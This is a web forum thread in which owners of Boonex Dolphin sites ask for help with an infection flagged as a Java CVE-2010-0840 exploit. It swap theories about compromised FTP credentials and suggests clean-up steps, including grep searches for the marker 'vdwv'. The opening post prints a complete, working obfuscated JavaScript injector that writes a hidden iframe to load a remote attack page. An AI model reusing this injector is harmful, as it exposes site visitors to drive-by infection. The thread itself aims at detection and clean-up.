IMPORTANT Exploit:Java/CVE-2010-0840.W (?)

I found in one of my dolphin sites :

this code :

<script>var zaee="4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,55.5*2,55.5*2,51.5*2,54*2,50.5*2,48.5*2,50*2,57.5*2,58*2,48.5*2,58*2,23*2,49.5*2,55.5*2,54.5*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,55.5*2,55.5*2,51.5*2,54*2,50.5*2,48.5*2,50*2,57.5*2,58*2,48.5*2,58*2,23*2,49.5*2,55.5*2,54.5*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2".split(",");hn=new Date();var diyb="";var xd="e"+(parseInt(hn.getMonth())-1)+"a"+diyb+"l";nt=(function(){return this;})();vdwv=nt[xd.replace("10","v")];gjuf=window['String'].fromCharCode;var ja='';for(var i=0;i<zaee.length;i++){ja+=gjuf(vdwv(zaee[i]));}
vdwv(ja);</script>

Exploit:Java/CVE-2010-0840.W (?)

Encyclopedia entry
Published: Dec 09, 2010

Aliases
Not available

Alert Level (?)
Severe

and moreinformation about this exploit can be found here:


http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Exploit%3aJava%2fCVE-2010-0840.W&threatid=2147641020
https://www.redhat.com/security/data/cve/CVE-2010-0840.html

any idea how to clean this code from the site ? i will pay

i need to know what is that exatcly .

Along with Yaserin, this code is found in numerous files of mine which is causing problems all over the site. What can we do to fix this?

Well !

I think it's Time Now to Know what's Up . I mean There is some of hackers and i'm sorry to say that here at boonex.com who are selling mods , i dont say that to play i have proofs and i will show you everything in details .

i believe that  Andrew Boon needs to know some details about some developers so he knows better than me to deal with them .

i just want boonex to be clean community and only professional people and good people to make dolphin a great SN .

i believe in boonex and i believe that dolphin is one of the best social networking in history.

i will upgrade to prime membership and i think its the time to talk directly to boonex team.

thank you

There need more detail analyze of you site. Read log file, check you version of dolphin.... etc. Maybe some of developers  here sold you infected modules. Please go to our support page and make a ticket

Thank You SashaE! I did .

Well ! I worked almost with many many Boonex community Developers in the past and i Respect them all ! and i thanks Them always for what they did to me and i will always do.

I too was infected on the 20th, luckly we do daily backups, thats the only way to fix it, I tried to fix it manually but it screwed me up ( the bot infected every index.php, index.html, home.php that my site has, and dolphin has alot.. ). my Host has the details on the attackers if any parties are interested, just message me..

I think personally that one of the programmers on this site was hacked and if they did work on your site, their ftp client would have your info saved in Cache somewhere and the Malicious software could of easily been distributed.

The bot had my username and password and I haven't changed that in a Month, I only had 2 - 3  programmers help me and I will personally message them about the possibility that they could be infected...

GREAT !

Thats What i SAID

They Attacked many Sites at boonex community .

THANK YOU:)

Another way of infected your site :

1. You use simple FTP manager. When you'll visit some infected site you will get some Trojan code.

2. Next, Trojan script will try connect to all of your sites use the not protected passwords of your simple ftp manager.

3. Than copy him body into some of your sites pages!

And USERS, kindly kindly revert your passwords once the developer is done with the mod/upgrade work...

And secondly give limited access for e.g. to install the mod, the developer only needs access to his/her mods folder under 'modules' folder, so limit FTP access only to that folder and nowhere else...

These 2 steps can take you a long way...

Being lazy at that time can cost big time later like in this case ...

Ok mods4dolphin I totally see your solution is a good and safe solution :)

THANK you

HUH

In addition, to ensure that you have removed all the infected files from your server, run the following command on your file system using SSH -

grep -lr vdwv *

If you don't have SSH, request your host to run that command. The command will list all files (if any) still infected with the virus code. Then repair those files and run the command again until it displays 0 files. Then make sure you change your FTP, Cpanel etc passwords....

Cheers

Dose anyone have the list of the infected files?

Various browser security is detecting issues known as "java/OpenConnection.OI". Security alerts from Microsoft Essentials point to CVE-2010-0840.

I have narrowed down the incidence of the trojan violation to a fairly simple page, not originating from the Dolphin directory tree, but the page contains an embedded ray powered video. By this, I conclude that the problem is somehow related to the display of videos loaded to the ray services.

The problem seems to narrow, I think, to a Dolphin 6.1.4 version that is operating on one of our sites.

That isn't to suggest that Dolphin is the culprit. It could be the video itself, or the flash files created by dolphin, or the video when it is converted from a camera .avi to an edited and compressed version before uploading.

At the moment, I am running

egrep -r '<script>var zaee="4.5*2,4.5*2,52.5*2,' *

at the command line as per yaserin's suggestion.  This will check all files on the server that have anything to do with Dolphin. When that is finished, I will run

egrep -lr vdwv *

as suggested by mods4dolphin.

I have a few questions.

1) Are there any other ways to detect the origin of the trojan code?

2) Is it possible that the trojan code is being embedded in videos that are being uploaded. They are being created using AVS Video Editor.

3) Is it possible that the trojan is being made available by the flash player used ray. Is there an alternative flash player that can be used so that I can test this.

Any other suggestions please.

Thank you.

Arthur